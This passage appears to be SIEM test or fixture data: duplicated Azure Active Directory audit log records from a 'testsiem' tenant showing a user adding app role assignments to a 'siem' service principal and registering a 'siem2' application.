"[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:30:06.2593808Z"}, {"Name": "env_epoch", "Value": "38FW7"}, {"Name": "env_seqNum", "Value": "43117959"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR57"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "a73c1c7e-5591-4912-94cc-527ad6f48ed8"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:30:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "654d7080-aee6-4826-abd9-c5710b336614"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:30:06.2593808Z"}, {"Name": "env_epoch", "Value": "38FW7"}, {"Name": "env_seqNum", "Value": "43117959"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR57"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "a73c1c7e-5591-4912-94cc-527ad6f48ed8"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:30:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"NewValue": "siem", "OldValue": "", "Name": "ServicePrincipal.DisplayName"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "654d7080-aee6-4826-abd9-c5710b336614"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:30:06.1843731Z"}, {"Name": "env_epoch", "Value": "38FW7"}, {"Name": "env_seqNum", "Value": "43117912"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR57"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "678f80a3-92c4-4bb6-83a1-1c39d5a87225"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:30:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23", "OldValue": "", "Name": "ServicePrincipal.ObjectID"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "654d7080-aee6-4826-abd9-c5710b336614"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:30:06.1843731Z"}, {"Name": "env_epoch", "Value": "38FW7"}, {"Name": "env_seqNum", "Value": "43117912"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR57"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "678f80a3-92c4-4bb6-83a1-1c39d5a87225"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:36:30", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem2"}], "ObjectId": "Not Available", "ModifiedProperties": [{"Name": "AppId", "OldValue": "[]", "NewValue": "[\r\n  \"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"\r\n]"}, {"Name": "AvailableToOtherTenants", "OldValue": "[]", "NewValue": "[\r\n  false\r\n]"}, {"Name": "DisplayName", "OldValue": "[]", "NewValue": "[\r\n  \"siem2\"\r\n]"}, {"Name": "RequiredResourceAccess", "OldValue": "[]", "NewValue": "[\r\n  {\r\n    \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n        \"DirectAccessGrant\": false,\r\n        \"ImpersonationAccessGrants\": [\r\n          20\r\n        ]\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  }\r\n]"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "AppId, AvailableToOtherTenants, DisplayName, RequiredResourceAccess"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"AppId\",\"AvailableToOtherTenants\",\"DisplayName\",\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "484659af-7387-4b77-b889-c4d2a8060004"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:36:30.6833528Z"}, {"Name": "env_epoch", "Value": "SDA9U"}, {"Name": "env_seqNum", "Value": "41554400"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR521"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add application.", "Id": "689aaff0-b34f-4077-9244-0563b9f9c03b"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:36:30", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem2"}], "ObjectId": "Not Available", "ModifiedProperties": [{"Name": "AppId", "OldValue": "[]", "NewValue": "[\r\n  \"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"\r\n]"}, {"Name": "AvailableToOtherTenants", "OldValue": "[]", "NewValue": "[\r\n  false\r\n]"}, {"Name": "DisplayName", "OldValue": "[]", "NewValue": "[\r\n  \"siem2\"\r\n]"}, {"NewValue": "[\r\n  {\r\n    \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n        \"DirectAccessGrant\": false,\r\n        \"ImpersonationAccessGrants\": [\r\n          20\r\n        ]\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  }\r\n]", "OldValue": "[]", "Name": "RequiredResourceAccess"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "AppId, AvailableToOtherTenants, DisplayName, RequiredResourceAccess"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"AppId\",\"AvailableToOtherTenants\",\"DisplayName\",\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "484659af-7387-4b77-b889-c4d2a8060004"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:36:30.6833528Z"}, {"Name": "env_epoch", "Value": "SDA9U"}, {"Name": "env_seqNum", "Value": "41554400"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR521"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add application.", "Id": "689aaff0-b34f-4077-9244-0563b9f9c03b"}
